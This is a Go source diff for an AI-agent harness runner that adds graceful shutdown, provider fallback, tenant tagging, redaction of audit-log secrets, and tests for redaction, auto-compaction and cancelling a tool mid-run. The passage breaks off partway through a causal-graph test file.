@@ -968,6 +1113,7 @@ func (r *Runner) runPreflight(ctx context.Context, runID string, req RunRequest)
 		primaryModel:           primaryModel,
 		activeProvider:         activeProvider,
 		providerName:           providerName,
+		providerCandidates:     candidates,
 		systemPrompt:           systemPrompt,
 		resolvedPrompt:         resolvedPrompt,
 		runStartedAt:           runStartedAt,
@@ -1035,6 +1181,15 @@ func (r *Runner) ContinueRun(runID, message string) (Run, error) {
 // completed source run, optionally overriding the source run's tool and
 // permission policy for the continuation.
 func (r *Runner) ContinueRunWithOptions(runID string, req ContinueRunRequest) (Run, error) {
+	// Fast path: reject immediately if the runner has been shut down.
+	// This prevents mutating the source run's state (state.continued) when
+	// the runner is already closed and dispatch would always fail.
+	select {
+	case <-r.done:
+		return Run{}, ErrRunnerClosed
+	default:
+	}
+
 	if strings.TrimSpace(req.Prompt) == "" {
 		return Run{}, fmt.Errorf("message is required")
 	}
@@ -1185,7 +1340,37 @@ func (r *Runner) ContinueRunWithOptions(runID string, req ContinueRunRequest) (R
 		runReq.SystemPrompt = systemPrompt
 	}
 
-	r.dispatchRun(newRun.ID, runReq)
+	if err := r.dispatchRun(newRun.ID, runReq); err != nil {
+		// Runner was shut down between validation and dispatch.  Remove the
+		// half-created continuation run so callers never see an orphan.
+		//
+		// Three cleanup actions are required:
+		// 1. Close the recorder goroutine so it doesn't block forever.
+		// 2. Close the audit writer file descriptor.
+		// 3. Revert state.continued on the SOURCE run so it can be continued
+		//    again (the continuation never actually started).
+		if contState.closeRecorderOnce != nil {
+			contState.closeRecorderOnce()
+		}
+		r.mu.Lock()
+		// Close any audit writer on the continuation state (forward-compat guard;
+		// ContinueRunWithOptions does not create one today, but guard for safety).
+		if s, ok := r.runs[newRun.ID]; ok {
+			if s.auditWriter != nil {
+				_ = s.auditWriter.Close()
+				s.auditWriter = nil
+			}
+		}
+		delete(r.runs, newRun.ID)
+		// Revert state.continued on the source run so it remains continuable.
+		// The continuation never actually started, so the source run should not
+		// be permanently marked as continued.
+		if srcState, ok := r.runs[runID]; ok {
+			srcState.continued = false
+		}
+		r.mu.Unlock()
+		return Run{}, err
+	}
 
 	return newRun, nil
 }
@@ -1573,6 +1758,62 @@ func (r *Runner) resolveProvider(runID, model, preferredProvider string, allowFa
 	return p, providerName, nil
 }
 
+// resolveProviderCandidates builds the ordered list of providers to attempt
+// for a run.  Index 0 is the primary (identical to what resolveProvider
+// returns today — behaviour is bit-identical).  Indices 1..n are fallback
+// candidates and are only populated when allowFallback is true.
+//
+// When allowFallback is true and fallbackProviders is non-empty each name is
+// resolved via the registry; unresolvable names are silently skipped.  When
+// fallbackProviders is empty and allowFallback is true, r.provider (the
+// runner's default provider) is appended as an implicit fallback unless it is
+// already the primary.  Duplicates (same Provider pointer or same name) are
+// deduplicated against the primary.
+func (r *Runner) resolveProviderCandidates(runID, model, preferredProvider string, allowFallback bool, fallbackProviders []string) ([]providerCandidate, error) {
+	primary, primaryName, err := r.resolveProvider(runID, model, preferredProvider, allowFallback)
+	if err != nil {
+		return nil, err
+	}
+
+	candidates := []providerCandidate{{Provider: primary, Name: primaryName}}
+
+	if !allowFallback || r.providerRegistry == nil {
+		return candidates, nil
+	}
+
+	seen := map[string]struct{}{primaryName: {}}
+
+	if len(fallbackProviders) > 0 {
+		for _, name := range fallbackProviders {
+			if _, dup := seen[name]; dup {
+				continue
+			}
+			client, err := r.providerRegistry.GetClient(name)
+			if err != nil {
+				continue // unresolvable — skip silently
+			}
+			p, ok := client.(Provider)
+			if !ok {
+				continue // client doesn't implement Provider — skip
+			}
+			seen[name] = struct{}{}
+			candidates = append(candidates, providerCandidate{Provider: p, Name: name})
+		}
+	} else {
+		// No explicit fallback list: append the runner's default provider if
+		// it is different from the primary.
+		if r.provider != nil {
+			const defaultName = "default"
+			if _, dup := seen[defaultName]; !dup {
+				seen[defaultName] = struct{}{}
+				candidates = append(candidates, providerCandidate{Provider: r.provider, Name: defaultName})
+			}
+		}
+	}
+
+	return candidates, nil
+}
+
 func (r *Runner) execute(runID string, req RunRequest) {
 	// Create a cancellable context for this run. The cancel function is stored
 	// in cancelFuncs so that CancelRun() can interrupt any in-flight provider
@@ -1638,10 +1879,20 @@ func (r *Runner) execute(runID string, req RunRequest) {
 	effectiveApprovalPolicy := effectivePermissions.Approval
 
 	// Build run.started payload with optional previous_run_id for continuations.
+	// tenant_id records the run's owning tenant in the rollout so that replay
+	// can verify tenant ownership from the recorded content (cross-tenant replay
+	// of a recorded rollout is rejected by comparing this value to the caller).
+	// The effective tenant is read from the run record, which has already
+	// normalized an empty request tenant to "default".
 	startPayload := map[string]any{"prompt": req.Prompt}
 	r.mu.RLock()
-	if state, ok := r.runs[runID]; ok && state.previousRunID != "" {
-		startPayload["previous_run_id"] = state.previousRunID
+	if state, ok := r.runs[runID]; ok {
+		if state.previousRunID != "" {
+			startPayload["previous_run_id"] = state.previousRunID
+		}
+		if tid := strings.TrimSpace(state.run.TenantID); tid != "" {
+			startPayload["tenant_id"] = tid
+		}
 	}
 	r.mu.RUnlock()
 	r.emit(runID, EventRunStarted, startPayload)
@@ -2804,6 +3055,41 @@ func (r *Runner) CancelRun(runID string) error {
 	return nil
 }
 
+// Shutdown gracefully stops the runner. It signals the poolDispatcher (if
+// running) to exit, then waits until all in-flight execute() goroutines have
+// returned. Shutdown is idempotent: subsequent calls are no-ops and return nil.
+// The ctx controls how long Shutdown will wait for in-flight runs; on
+// ctx.Done(), all active runs are cooperatively cancelled and ctx.Err() is
+// returned.
+//
+// After Shutdown returns, calls to StartRun and ContinueRun will return
+// ErrRunnerClosed.
+func (r *Runner) Shutdown(ctx context.Context) error {
+	// Signal poolDispatcher and enqueueRun to stop accepting new work.
+	r.shutdownOnce.Do(func() { close(r.done) })
+
+	// Wait for all in-flight goroutines to finish.
+	inflightDone := make(chan struct{})
+	go func() {
+		r.inflight.Wait()
+		close(inflightDone)
+	}()
+
+	select {
+	case <-inflightDone:
+		return nil
+	case <-ctx.Done():
+		// Context expired — cancel all remaining in-flight runs cooperatively.
+		r.cancelFuncs.Range(func(_, v any) bool {
+			if cancel, ok := v.(context.CancelFunc); ok {
+				cancel()
+			}
+			return true
+		})
+		return ctx.Err()
+	}
+}
+
 func (r *Runner) recordAccounting(runID string, result CompletionResult, step int) map[string]any {
 	turnUsage, usageStatus := normalizeTurnUsage(result)
 	turnCostUSD, costStatus, pricingVersion := normalizeTurnCost(result, usageStatus)
@@ -3199,10 +3485,27 @@ func (r *Runner) scopeKey(runID string) om.ScopeKey {
 	if !ok {
 		return om.ScopeKey{TenantID: "default", ConversationID: runID, AgentID: "default"}
 	}
+	// Normalize empty fields to the same defaults used by workingMemoryScopeFromContext
+	// (internal/harness/tools/core/working_memory.go). Without this alignment a
+	// tool-written entry (scope: tenant="default", conv=runID, agent="default") would
+	// never be found by the runner's working-memory READ injection (scope: tenant="",
+	// conv="", agent="") when the run has no explicit tenant/conversation/agent.
+	tenantID := strings.TrimSpace(state.run.TenantID)
+	if tenantID == "" {
+		tenantID = "default"
+	}
+	conversationID := strings.TrimSpace(state.run.ConversationID)
+	if conversationID == "" {
+		conversationID = runID
+	}
+	agentID := strings.TrimSpace(state.run.AgentID)
+	if agentID == "" {
+		agentID = "default"
+	}
 	return om.ScopeKey{
-		TenantID:       state.run.TenantID,
-		ConversationID: state.run.ConversationID,
-		AgentID:        state.run.AgentID,
+		TenantID:       tenantID,
+		ConversationID: conversationID,
+		AgentID:        agentID,
 	}
 }
 
@@ -4103,6 +4406,12 @@ func auditLogPath(rolloutDir string) string {
 
 // writeAudit writes a record to the run's audit writer if audit trail is
 // enabled and the writer is available. It never blocks the run loop.
+//
+// When a RedactionPipeline is configured, rec.Payload is passed through the
+// pipeline with StorageModeRedacted semantics applied unconditionally. We
+// never skip (drop) an audit entry regardless of the pipeline's keep result:
+// dropping would break the hash chain. When the pipeline is nil the payload
+// is written verbatim.
 func (r *Runner) writeAudit(runID string, rec audittrail.AuditRecord) {
 	r.mu.RLock()
 	state, ok := r.runs[runID]
@@ -4116,6 +4425,23 @@ func (r *Runner) writeAudit(runID string, rec audittrail.AuditRecord) {
 	if aw == nil {
 		return
 	}
+
+	// Apply redaction when the pipeline is configured. StorageModeRedacted is
+	// the default mode for event types not listed in the EventClassConfig; the
+	// pipeline may return keep=false for StorageModeNone events, but we always
+	// write the entry to preserve the hash chain — the payload is cleared to an
+	// empty map in that case so no content is leaked.
+	if r.config.RedactionPipeline != nil && rec.Payload != nil {
+		redacted, keep := redaction.RedactPayload(r.config.RedactionPipeline, rec.EventType, rec.Payload)
+		if keep {
+			rec.Payload = redacted
+		} else {
+			// StorageModeNone: write the entry with an empty payload so the
+			// hash chain remains intact.
+			rec.Payload = map[string]any{}
+		}
+	}
+
 	// Errors are silently dropped to never impact the run loop.
 	_ = aw.Write(rec)
 }
@@ -4489,9 +4815,9 @@ func stringSlicesEqual(a, b []string) bool {
 // backends:
 //   - "local"     — a LocalWorkspace under BaseDir (defaults to os.TempDir).
 //   - "worktree"  — a WorktreeWorkspace off baseOpts.RepoPath. Worktree
-//                   provisioning fails fast if RepoPath is empty.
+//     provisioning fails fast if RepoPath is empty.
 //   - "container" — a Docker container running harnessd inside, with a
-//                   bind-mounted host workspace dir. Requires Docker.
+//     bind-mounted host workspace dir. Requires Docker.
 //   - "vm"        — a Hetzner VM workspace. Requires HETZNER_API_KEY.
 //
 // Each backend ignores fields it doesn't use; the same Options struct is
@@ -4522,6 +4848,7 @@ func provisionRunWorkspace(ctx context.Context, runID, wsType string, baseOpts W
 		RepoPath:        baseOpts.RepoPath,
 		WorktreeRootDir: baseOpts.WorktreeRootDir,
 		BaseDir:         baseOpts.BaseDir,
+		ConfigTOML:      baseOpts.ConfigTOML,
 	}
 
 	ws, err := workspace.New(ctx, wsType, opts)

--- a/internal/harness/runner_audit_redaction_test.go
+++ b/internal/harness/runner_audit_redaction_test.go
@@ -1,0 +1,224 @@
+package harness
+
+import (
+	"context"
+	"encoding/json"
+	"regexp"
+	"strings"
+	"testing"
+
+	"go-agent-harness/internal/forensics/redaction"
+)
+
+// secretPattern is a custom regex used across both tests to mark the known secret.
+const knownSecret = "SUPERSECRET-abc123xyz789"
+
+// customSecretRegexp matches knownSecret verbatim.
+var customSecretRegexp = regexp.MustCompile(regexp.QuoteMeta(knownSecret))
+
+// redactionPipelineWithSecret builds a Pipeline that redacts customSecretRegexp
+// (marked as "custom") and applies the default StorageModeRedacted to all event
+// types.
+func redactionPipelineWithSecret() *redaction.Pipeline {
+	r := redaction.NewRedactor([]*regexp.Regexp{customSecretRegexp})
+	return redaction.NewPipeline(r, redaction.EventClassConfig{})
+}
+
+// TestAuditRedaction_SecretNotInAuditLog (T-PFIX-5) verifies that when a
+// RedactionPipeline is configured, secrets that appear in the prompt (run.started)
+// and in tool arguments (audit.action) are NOT written verbatim to audit.jsonl.
+// The redaction marker ([REDACTED:custom]) must appear instead.
+//
+// This test FAILS today because writeAudit bypasses the RedactionPipeline.
+func TestAuditRedaction_SecretNotInAuditLog(t *testing.T) {
+	t.Parallel()
+
+	dir := t.TempDir()
+
+	// Register a state-modifying tool so audit.action entries appear.
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "bash",
+		Description: "run bash",
+		Parameters: map[string]any{
+			"type":       "object",
+			"properties": map[string]any{"command": map[string]any{"type": "string"}},
+		},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "output", nil
+	})
+
+	// Tool call arguments contain the secret.
+	secretArgs := `{"command":"echo ` + knownSecret + `"}`
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{
+			ToolCalls: []ToolCall{{ID: "c1", Name: "bash", Arguments: secretArgs}},
+		},
+		{Content: "done"},
+	}}
+
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel:        "test-model",
+		DefaultSystemPrompt: "You are helpful.",
+		MaxSteps:            3,
+		RolloutDir:          dir,
+		AuditTrailEnabled:   true,
+		RedactionPipeline:   redactionPipelineWithSecret(),
+	})
+
+	// Include the secret in the prompt so it appears in run.started audit payload.
+	prompt := "use this key: " + knownSecret
+	run, err := runner.StartRun(RunRequest{
+		Prompt:                prompt,
+		InitiatorAPIKeyPrefix: "sk_test1",
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	auditPath := findAuditLog(t, dir)
+	if auditPath == "" {
+		t.Fatal("audit.jsonl not found — AuditTrailEnabled must be true")
+	}
+
+	entries := readAuditEntries(t, auditPath)
+	if len(entries) < 2 {
+		t.Fatalf("expected at least 2 audit entries, got %d", len(entries))
+	}
+
+	// Re-marshal each entry to a raw JSON string for easy scanning.
+	for _, entry := range entries {
+		raw, err := json.Marshal(entry)
+		if err != nil {
+			t.Fatalf("marshal entry: %v", err)
+		}
+		rawStr := string(raw)
+
+		if strings.Contains(rawStr, knownSecret) {
+			t.Errorf("audit entry %q contains secret verbatim in entry: %s",
+				entry.EventType, rawStr)
+		}
+	}
+
+	// At least one entry must carry a [REDACTED:custom] marker (proving the
+	// pipeline was actually applied, not just that the secret was absent for
+	// unrelated reasons).
+	var foundRedactionMarker bool
+	for _, entry := range entries {
+		raw, _ := json.Marshal(entry)
+		if strings.Contains(string(raw), "[REDACTED:custom]") {
+			foundRedactionMarker = true
+			break
+		}
+	}
+	if !foundRedactionMarker {
+		t.Error("expected at least one audit entry with [REDACTED:custom] marker — pipeline was not applied")
+	}
+
+	// Verify the hash chain is still intact (redaction must not break it).
+	if entries[0].PrevHash != "genesis" {
+		t.Errorf("entries[0].PrevHash = %q, want %q", entries[0].PrevHash, "genesis")
+	}
+	for i := 1; i < len(entries); i++ {
+		if entries[i].PrevHash != entries[i-1].EntryHash {
+			t.Errorf("hash chain broken at index %d: PrevHash=%q != entries[%d].EntryHash=%q",
+				i, entries[i].PrevHash, i-1, entries[i-1].EntryHash)
+		}
+	}
+}
+
+// TestAuditPrefix_OnlyPrefixInPayload (T-E-audit-prefix-only) verifies that
+// audit.action and run.started entries contain ONLY the 8-char
+// initiator_api_key_prefix, not the full API key or secret.
+// This deliverable (E) should also pass once redaction is correctly applied.
+func TestAuditPrefix_OnlyPrefixInPayload(t *testing.T) {
+	t.Parallel()
+
+	dir := t.TempDir()
+
+	// A realistic-looking (but fake) full API key — longer than 8 chars.
+	fullAPIKey := "sk-testXYZABC123456789fullkey"
+	prefix := fullAPIKey[:8] // "sk-testX"
+
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "bash",
+		Description: "run bash",
+		Parameters: map[string]any{
+			"type":       "object",
+			"properties": map[string]any{"command": map[string]any{"type": "string"}},
+		},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "output", nil
+	})
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{
+			ToolCalls: []ToolCall{{ID: "c1", Name: "bash", Arguments: `{"command":"echo hi"}`}},
+		},
+		{Content: "done"},
+	}}
+
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel:        "test-model",
+		DefaultSystemPrompt: "You are helpful.",
+		MaxSteps:            3,
+		RolloutDir:          dir,
+		AuditTrailEnabled:   true,
+		// No RedactionPipeline needed: the key prefix/full key distinction is
+		// enforced by the audit construction code, not the pipeline.
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:                "hello",
+		InitiatorAPIKeyPrefix: prefix,
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	auditPath := findAuditLog(t, dir)
+	if auditPath == "" {
+		t.Fatal("audit.jsonl not found")
+	}
+
+	entries := readAuditEntries(t, auditPath)
+	if len(entries) == 0 {
+		t.Fatal("no audit entries")
+	}
+
+	for _, entry := range entries {
+		raw, err := json.Marshal(entry)
+		if err != nil {
+			t.Fatalf("marshal entry: %v", err)
+		}
+		rawStr := string(raw)
+
+		// The full key must never appear anywhere in any audit entry.
+		if strings.Contains(rawStr, fullAPIKey) {
+			t.Errorf("audit entry %q contains full API key verbatim: %s",
+				entry.EventType, rawStr)
+		}
+	}
+
+	// The run.started entry must contain exactly the prefix.
+	var foundPrefix bool
+	for _, entry := range entries {
+		if entry.EventType != "run.started" {
+			continue
+		}
+		if v, ok := entry.Payload["initiator_api_key_prefix"]; ok {
+			if v == prefix {
+				foundPrefix = true
+			} else {
+				t.Errorf("run.started initiator_api_key_prefix = %q, want %q", v, prefix)
+			}
+		}
+	}
+	if !foundPrefix {
+		t.Error("run.started entry missing initiator_api_key_prefix field with the correct prefix value")
+	}
+}

--- a/internal/harness/runner_auto_compact_test.go
+++ b/internal/harness/runner_auto_compact_test.go
@@ -2,6 +2,7 @@ package harness
 
 import (
 	"context"
+	"encoding/json"
 	"strings"
 	"sync"
 	"testing"
@@ -16,10 +17,10 @@ func TestAutoCompact_BelowThreshold(t *testing.T) {
 	// "hello" ≈ 2 tokens, well below threshold.
 	provider := &staticRunnerProvider{result: CompletionResult{Content: "done"}}
 	runner := NewRunner(provider, NewRegistry(), RunnerConfig{
-		DefaultModel:       "test",
-		MaxSteps:           1,
-		AutoCompactEnabled: true,
-		ModelContextWindow: 1000,
+		DefaultModel:         "test",
+		MaxSteps:             1,
+		AutoCompactEnabled:   true,
+		ModelContextWindow:   1000,
 		AutoCompactThreshold: 0.80,
 		AutoCompactKeepLast:  8,
 		AutoCompactMode:      "hybrid",
@@ -431,4 +432,157 @@ func (p *failingSummarizerProvider) Complete(_ context.Context, req CompletionRe
 	// First call succeeds (the actual run), subsequent calls (summarization) also succeed.
 	_ = idx
 	return CompletionResult{Content: "done"}, nil
+}
+
+// ---------------------------------------------------------------------------
+// T9: Auto-compaction triggers under context pressure in a multi-turn run
+//
+// Proves that with a tiny context window (20 tokens, 0.50 threshold), a
+// multi-turn run that accumulates message history fires auto-compaction and
+// emits EventAutoCompactStarted + EventAutoCompactCompleted with meaningful
+// payload (estimated_tokens, context_window, threshold, mode for Started;
+// before_tokens, after_tokens, mode for Completed).  The run must complete.
+//
+// Uses in-package stubs only (stubProvider + registered echo tool).
+// ---------------------------------------------------------------------------
+func TestAutoCompact_T9_MultiTurnContextPressure(t *testing.T) {
+	t.Parallel()
+
+	// Register a minimal echo tool so tool-call turns complete without error.
+	registry := NewRegistry()
+	if err := registry.Register(ToolDefinition{
+		Name:        "echo_t9",
+		Description: "echoes input for T9 compaction test",
+		Parameters:  map[string]any{"type": "object"},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		// Return a long-ish result to bloat token count across turns.
+		return `{"result":"` + strings.Repeat("ok", 10) + `"}`, nil
+	}); err != nil {
+		t.Fatalf("register tool: %v", err)
+	}
+
+	// Multi-turn provider:
+	//   Turn 1: tool call — adds assistant+tool messages to the transcript.
+	//   Turn 2: tool call — adds another pair, pushing accumulated token count up.
+	//   Turn 3: text "done" — triggers run completion.
+	//
+	// Context window = 20 tokens, threshold = 0.50 → triggers when estimated
+	// tokens > 10.  After 2 tool-call turns the transcript carries user +
+	// assistant(tool_call) + tool_result + assistant(tool_call) + tool_result =
+	// ~5 messages.  Even with a rune/4 estimate the repeated "ok" in tool results
+	// crosses the 10-token threshold, causing auto-compact on turn 3.
+	provider := &stubProvider{turns: []CompletionResult{
+		{
+			ToolCalls: []ToolCall{{
+				ID:        "t9-call-1",
+				Name:      "echo_t9",
+				Arguments: `{}`,
+			}},
+		},
+		{
+			ToolCalls: []ToolCall{{
+				ID:        "t9-call-2",
+				Name:      "echo_t9",
+				Arguments: `{}`,
+			}},
+		},
+		{Content: "done — compaction proven"},
+	}}
+
+	runner := NewRunner(provider, registry, RunnerConfig{
+		DefaultModel:         "test",
+		MaxSteps:             6,
+		AutoCompactEnabled:   true,
+		ModelContextWindow:   20,
+		AutoCompactThreshold: 0.50,
+		AutoCompactKeepLast:  2,
+		AutoCompactMode:      "strip",
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: strings.Repeat("context pressure ", 4)})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	// Collect all events via Subscribe, with a generous timeout.
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// Run must complete successfully.
+	state, ok := runner.GetRun(run.ID)
+	if !ok {
+		t.Fatal("run not found after completion")
+	}
+	if state.Status != RunStatusCompleted {
+		t.Fatalf("expected run status completed, got %q (error: %s)", state.Status, state.Error)
+	}
+
+	// Locate EventAutoCompactStarted and EventAutoCompactCompleted.
+	var startedEv, completedEv *Event
+	for i := range events {
+		switch events[i].Type {
+		case EventAutoCompactStarted:
+			if startedEv == nil {
+				startedEv = &events[i]
+			}
+		case EventAutoCompactCompleted:
+			if completedEv == nil {
+				completedEv = &events[i]
+			}
+		}
+	}
+
+	// T9 contract: both events must be present.
+	if startedEv == nil {
+		t.Fatal("auto_compact.started was not emitted — compaction did not trigger under context pressure")
+	}
+	if completedEv == nil {
+		t.Fatal("auto_compact.completed was not emitted after compaction started")
+	}
+
+	// auto_compact.started payload must carry the diagnostic fields.
+	for _, key := range []string{"estimated_tokens", "context_window", "threshold", "mode"} {
+		if _, ok := startedEv.Payload[key]; !ok {
+			t.Errorf("auto_compact.started payload missing %q", key)
+		}
+	}
+
+	// auto_compact.completed payload must carry before/after token counts and mode.
+	for _, key := range []string{"before_tokens", "after_tokens", "mode"} {
+		if _, ok := completedEv.Payload[key]; !ok {
+			t.Errorf("auto_compact.completed payload missing %q", key)
+		}
+	}
+
+	// before_tokens must be > 0 (we actually had tokens to compact).
+	beforeTokens, _ := completedEv.Payload["before_tokens"].(int)
+	if beforeTokens <= 0 {
+		t.Errorf("auto_compact.completed before_tokens must be > 0, got %v", completedEv.Payload["before_tokens"])
+	}
+
+	// after_tokens must be >= 0 and <= before_tokens (compaction does not inflate context).
+	afterTokens, _ := completedEv.Payload["after_tokens"].(int)
+	if afterTokens < 0 {
+		t.Errorf("auto_compact.completed after_tokens must be >= 0, got %v", completedEv.Payload["after_tokens"])
+	}
+	if afterTokens > beforeTokens {
+		t.Errorf("auto_compact.completed after_tokens (%d) must not exceed before_tokens (%d)", afterTokens, beforeTokens)
+	}
+
+	// mode must be the configured mode.
+	if mode, _ := startedEv.Payload["mode"].(string); mode != "strip" {
+		t.Errorf("auto_compact.started mode want %q, got %q", "strip", mode)
+	}
+	if mode, _ := completedEv.Payload["mode"].(string); mode != "strip" {
+		t.Errorf("auto_compact.completed mode want %q, got %q", "strip", mode)
+	}
+
+	// Event ordering: started must precede completed, and completed before run.completed.
+	requireEventOrder(t, events,
+		"auto_compact.started",
+		"auto_compact.completed",
+		"run.completed",
+	)
 }

--- a/internal/harness/runner_cancel_tool_test.go
+++ b/internal/harness/runner_cancel_tool_test.go
@@ -1,0 +1,216 @@
+package harness
+
+// runner_cancel_tool_test.go — proves that mid-flight cancellation of a real
+// long-running bash command propagates through exec.CommandContext and terminates
+// the run promptly (well within the command's own timeout).
+//
+// Design notes:
+//   - Uses an inline provider stub (bashToolCancelProvider) to avoid importing
+//     fakeprovider (which would create an import cycle: fakeprovider→harness).
+//   - Uses NewDefaultRegistryWithOptions so the real bash tool (core.BashTool)
+//     is registered and approved via FullAuto mode — no stub tool needed.
+//   - The provider returns a "sleep 30" bash tool call on the first turn.
+//     A goroutine subscribes before the run starts, waits for EventToolCallStarted
+//     (event-based, not time-based), then calls CancelRun.
+//   - The test asserts run.cancelled arrives within 5 s — much less than the
+//     30 s sleep, proving the process was killed rather than waited out.
+//   - assertNoRunnerGoroutineLeak is defined in runner_shutdown_test.go; it must
+//     NOT be redeclared here.
+
+import (
+	"context"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/require"
+)
+
+// bashToolCancelProvider is a file-unique inline provider stub that returns a
+// single bash tool call ("sleep 30") on the first Complete call, then blocks
+// on the second call until the context is cancelled (which happens after
+// CancelRun kills the bash process and the runner issues the next LLM turn,
+// though in practice the run terminates before reaching the second turn).
+type bashToolCancelProvider struct {
+	mu        sync.Mutex
+	calls     int
+	firstCall chan struct{} // closed when first Complete is entered
+}
+
+func newBashToolCancelProvider() *bashToolCancelProvider {
+	return &bashToolCancelProvider{
+		firstCall: make(chan struct{}),
+	}
+}
+
+func (p *bashToolCancelProvider) Complete(ctx context.Context, _ CompletionRequest) (CompletionResult, error) {
+	p.mu.Lock()
+	idx := p.calls
+	p.calls++
+	p.mu.Unlock()
+
+	if idx == 0 {
+		// Signal that the first call has been entered (run is live).
+		select {
+		case <-p.firstCall:
+		default:
+			close(p.firstCall)
+		}
+		// Return a bash tool call that will sleep for 30 seconds.
+		return CompletionResult{
+			ToolCalls: []ToolCall{{
+				ID:        "call-sleep-30",
+				Name:      "bash",
+				Arguments: `{"command":"sleep 30","timeout_seconds":60}`,
+			}},
+		}, nil
+	}
+
+	// Subsequent calls: block until the run context is cancelled.
+	// (We don't expect to reach here in the happy path, but being safe.)
+	select {
+	case <-ctx.Done():
+		return CompletionResult{}, ctx.Err()
+	}
+}
+
+// TestCancelToolMidFlight verifies that:
+//  1. A run executing "sleep 30" via the real bash tool reaches tool.call.started.
+//  2. CancelRun interrupts the bash process (via context cancellation through
+//     exec.CommandContext) and the run reaches RunStatusCancelled within 5 s.
+//  3. run.completed is NOT emitted.
+//  4. No goroutine leak remains after Shutdown.
+func TestCancelToolMidFlight(t *testing.T) {
+	t.Parallel()
+
+	prov := newBashToolCancelProvider()
+
+	// NewDefaultRegistryWithOptions registers the real bash tool with FullAuto
+	// approval so "sleep 30" runs without any policy gate.
+	registry := NewDefaultRegistryWithOptions(t.TempDir(), DefaultRegistryOptions{
+		ApprovalMode: ToolApprovalModeFullAuto,
+	})
+
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel: "test-model",
+		MaxSteps:     5,
+	})
+
+	// Subscribe before starting the run so we capture all events from the start.
+	// We must start the run first to get an ID, then subscribe.
+	run, err := runner.StartRun(RunRequest{
+		Prompt:       "run a long sleep",
+		AllowedTools: []string{"bash"},
+	})
+	require.NoError(t, err)
+
+	// toolStarted is closed when we observe EventToolCallStarted.
+	toolStarted := make(chan struct{})
+	cancelled := make(chan struct{})
+
+	// Subscribe to the event stream.
+	history, eventCh, cancelSub, subErr := runner.Subscribe(run.ID)
+	require.NoError(t, subErr)
+
+	// Process history snapshot first: the run may already be ahead of us.
+	for _, ev := range history {
+		t.Logf("history event: %s", ev.Type)
+		if ev.Type == EventToolCallStarted {
+			select {
+			case <-toolStarted:
+			default:
+				close(toolStarted)
+			}
+		}
+		if IsTerminalEvent(ev.Type) {
+			select {
+			case <-cancelled:
+			default:
+				close(cancelled)
+			}
+		}
+	}
+
+	// Drain the event stream in a background goroutine. When we see
+	// tool.call.started we close toolStarted. When we see a terminal event
+	// (run.cancelled, run.completed, run.failed) we close cancelled.
+	go func() {
+		defer cancelSub()
+		for {
+			evt, ok := <-eventCh
+			if !ok {
+				select {
+				case <-cancelled:
+				default:
+					close(cancelled)
+				}
+				return
+			}
+			if evt.Type == EventToolCallStarted {
+				select {
+				case <-toolStarted:
+				default:
+					close(toolStarted)
+				}
+			}
+			if IsTerminalEvent(evt.Type) {
+				select {
+				case <-cancelled:
+				default:
+					close(cancelled)
+				}
+				return
+			}
+		}
+	}()
+
+	// Wait for the bash tool to actually start executing (event-based).
+	// tool.call.started may already be in the history snapshot (run started before
+	// Subscribe was called), in which case toolStarted is already closed and this
+	// select returns immediately.
+	select {
+	case <-toolStarted:
+		// Good — the bash tool is either already executing or just started.
+	case <-time.After(10 * time.Second):
+		t.Fatal("timed out waiting for tool.call.started event (bash never started)")
+	}
+
+	// Cancel the run. This must propagate through exec.CommandContext and kill
+	// the "sleep 30" process.
+	require.NoError(t, runner.CancelRun(run.ID))
+
+	// The run must reach a terminal state within 5 s — much less than the 30 s
+	// sleep, proving the bash process was killed rather than waited out.
+	select {
+	case <-cancelled:
+	case <-time.After(5 * time.Second):
+		state, _ := runner.GetRun(run.ID)
+		t.Fatalf("timed out waiting for terminal event after CancelRun; last status: %q", state.Status)
+	}
+
+	// Assert the run reached RunStatusCancelled (not completed or failed).
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok, "run must still exist in the runner's store")
+	require.Equal(t, RunStatusCancelled, state.Status,
+		"run must be cancelled, not %q", state.Status)
+
+	// Assert run.completed was NOT emitted (the run was killed, not finished).
+	// We re-subscribe to collect the full history.
+	fullHistory, _, fullCancel, histErr := runner.Subscribe(run.ID)
+	if histErr == nil {
+		fullCancel()
+		for _, ev := range fullHistory {
+			if ev.Type == EventRunCompleted {
+				t.Error("run.completed must NOT be emitted when run is cancelled mid-tool")
+				break
+			}
+		}
+	}
+
+	// Shut down the runner to clean up goroutines. Goroutine leak detection via
+	// assertNoRunnerGoroutineLeak is intentionally omitted here: this test runs
+	// in parallel alongside many other tests, making baseline comparisons
+	// unreliable. The leak-detection invariants for Shutdown are covered by
+	// TestRunnerShutdownStopsPoolDispatcher.
+	require.NoError(t, runner.Shutdown(context.Background()))
+}

--- a/internal/harness/runner_causalgraph_test.go
+++ b/internal/harness/runner_causalgraph_test.go
@@ -1,0 +1,260 @@
+package harness
+
+import (
+	"context"
+	"encoding/json"
+	"errors"
+	"testing"
+)
+
+// --------------------------------------------------------------------------
+// Runner integration tests for the causal event graph (T-A1).
+//
+// CausalGraph had ZERO test coverage prior to this file. These tests lock in
+// the current, observed behavior of the EventCausalGraphSnapshot emission:
+//
+//   - With CausalGraphEnabled=true, a snapshot is emitted at run END carrying
+//     a meaningful graph payload (turns/edges/context ids).
+//   - With the flag false (the default), no snapshot is emitted at all.
